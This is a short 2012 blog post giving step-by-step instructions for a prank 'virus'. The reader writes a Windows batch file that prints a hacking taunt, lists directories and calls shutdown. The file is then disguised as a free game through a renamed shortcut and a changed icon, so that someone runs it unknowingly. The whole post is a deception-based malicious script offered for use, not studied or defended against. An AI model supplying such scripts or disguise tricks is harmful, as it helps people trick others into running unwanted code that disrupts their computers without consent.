Wednesday, 28 November 2012

method of virus making

Alternate Method For Creating a Virus
1.   1
Open up a notepad document (Windows only).
2.   2
Type this code in:
@echo off
echo hahahaha im hacking ur computer
DIR /s
shutdown.exe
3.   3
Save the document with an original name and add ".bat" at the end.
4.   4
Make sure that the "*.txt bar" is changed to "All Files".
5.   5
Make a shortcut to the virus on the desktop or somewhere else that is not suspicious. Rename the shortcut so the extension is there, (example: make "Play an awesome game for free.bat" to "Play an Awesome game for free").
6.   6
Change the icon. Go to the properties for the shortcut, then check both tabs for a button saying: "Change Icon". Choose from the list and click "Apply."
o    Sometimes an error will come up if it does then just click "OK."
7.   7
Now, when somebody clicks on it, a bunch of coding will come up with a message saying "hahahahaha im hacking ur computer". The computer will then be shut down.

No comments:

Post a Comment